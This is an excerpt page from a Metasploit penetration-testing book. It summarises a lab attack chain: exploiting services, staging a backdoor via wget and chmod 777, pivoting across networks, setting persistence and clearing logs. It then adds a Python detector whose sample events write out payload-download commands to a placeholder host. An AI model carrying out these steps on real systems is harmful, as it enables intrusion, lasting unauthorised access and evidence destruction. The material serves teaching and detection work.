Mastering Metasploit

You're reading from Mastering Metasploit: Discover the next level of network defense with the Metasploit framework

Product type: Paperback
Published in: Sep 2016
Publisher: Packt
ISBN-13: 9781786463166
Length: 440 pages
Edition: 2nd Edition
Author: Nipun Jaswal
Table of Contents (11 chapters)

Preface
1. Approaching a Penetration Test Using Metasploit
2. Reinventing Metasploit
3. The Exploit Formulation Process
4. Porting Exploits
5. Testing Services with Metasploit
6. Virtual Test Grounds and Staging
7. Client-side Exploitation
8. Metasploit Extended
9. Speeding up Penetration Testing
10. Visualizing with Armitage

Revising the approach

Let us summarize the entire penetration test step by step:

  1. In the very first step, we ran an Nmap scan against the target.
  2. We found that VSFTPD 2.3.4 was running on port 21 and was vulnerable to attack.
  3. We exploited VSFTPD 2.3.4 running on port 21.
  4. We gained shell access to the target running at 192.168.10.112.

  5. We created a Linux Meterpreter shell and copied it to the /var/www directory of Apache. Next, we ran the wget command from the shell and downloaded our newly created Meterpreter shell onto the target.
  6. We assigned full privileges to the shell backdoor file via chmod 777 backdoor.elf.
  7. With an exploit handler listening on port 4444 in a separate window, we ran the backdoor.elf file on the target.
  8. We gained Linux Meterpreter access on the target system, which is 192.168.10.112.
  9. Running the arp command on the compromised system, we found that it was also attached to a separate internal network and connected to another system at the internal IP address 192.168.20.4.

  10. We quickly set up an autoroute to the 192.168.20.0/24 network via our Meterpreter shell on 192.168.10.112.
  11. Pivoting all the traffic through our Meterpreter session, we ran a TCP port scan and service identification modules against the target.
  12. We found that the target was running a vulnerable version of PHP on port 80.
  13. We exploited the system using the PHP CGI Argument Injection vulnerability.
  14. We gained PHP Meterpreter access to the internal system of the network running at 192.168.20.4.
  15. We repeated the steps performed on the first system, uploading and executing the backdoor.elf file.
  16. We gained Linux Meterpreter access to the target.
  17. We ran the arp command to find out whether any other hosts were present on the network.
  18. We found one more system running at IP address 192.168.20.6 and performed a TCP port scan against it.

  19. Scanning all the ports, we found that HFS 2.3 was running on port 8080 and was vulnerable to the Remote Command Execution vulnerability.
  20. We exploited the system using the HFS exploit module in Metasploit.
  21. We gained Windows Meterpreter access to the target.
  22. We ran a persistence module to maintain access to the target.
  23. The persistence module tries to establish a connection to our system every few seconds and opens Meterpreter access as soon as a handler is up.
  24. We cleared the logs via the event_manager module from Meterpreter.
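
Seen from the defender's side, steps 5 to 7 and step 15 leave a recognisable process trail on the Linux hosts: a wget download, a chmod that sets execute bits on the downloaded file, then execution of that file. The sketch below is an added example, not code from the book, that correlates that chain per host. The event tuple format, the 10-minute window and the 203.0.113.5 download address are assumptions, and the sample events are constructed.

```python
import posixpath
import shlex
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed process-execution events: (host, ISO timestamp, command line).
SAMPLE_EVENTS = [
    ("192.168.10.112", "2024-01-15T10:00:05", "wget http://203.0.113.5/backdoor.elf"),
    ("192.168.10.112", "2024-01-15T10:00:20", "chmod 777 backdoor.elf"),
    ("192.168.10.112", "2024-01-15T10:00:31", "./backdoor.elf"),
    ("192.168.20.4", "2024-01-15T10:41:02", "wget http://203.0.113.5/backdoor.elf"),
    ("192.168.20.4", "2024-01-15T10:41:30", "chmod 777 backdoor.elf"),
    ("192.168.20.4", "2024-01-15T10:42:10", "/tmp/backdoor.elf"),
    ("192.168.10.50", "2024-01-15T11:00:00", "wget https://example.org/report.pdf"),
    ("192.168.10.50", "2024-01-15T11:00:09", "chmod 644 report.pdf"),
]

def grants_exec(mode):
    """True if a chmod mode argument (octal or symbolic) sets an execute bit."""
    if mode and all(c in "01234567" for c in mode):
        return int(mode, 8) & 0o111 != 0
    return "+" in mode and "x" in mode.split("+", 1)[1]

def find_staged_payloads(events, window=timedelta(minutes=10)):
    """Return (host, file, time) for each download -> chmod +x -> execute chain."""
    staged = {}  # (host, filename) -> {"download": datetime, "chmod": bool}
    alerts = []
    for host, ts, cmdline in sorted(events, key=lambda e: e[1]):
        when, argv = datetime.fromisoformat(ts), shlex.split(cmdline)
        if not argv:
            continue
        prog = posixpath.basename(argv[0])
        if prog == "wget":  # assumes the file keeps the URL's name (no -O rename)
            for arg in argv[1:]:
                name = posixpath.basename(urlparse(arg).path) if "://" in arg else ""
                if name:
                    staged[(host, name)] = {"download": when, "chmod": False}
        elif prog == "chmod" and len(argv) >= 3 and grants_exec(argv[1]):
            for target in argv[2:]:
                if (host, posixpath.basename(target)) in staged:
                    staged[(host, posixpath.basename(target))]["chmod"] = True
        else:  # any other program: is it a file this host just downloaded?
            entry = staged.get((host, prog))
            if entry and entry["chmod"] and when - entry["download"] <= window:
                alerts.append((host, prog, ts))
    return alerts

if __name__ == "__main__":
    print(find_staged_payloads(SAMPLE_EVENTS))
```

The same correlation applies to any normalised exec telemetry (auditd execve records, EDR process events); matching on file name alone is a simplification that a production rule would replace with full paths or file hashes.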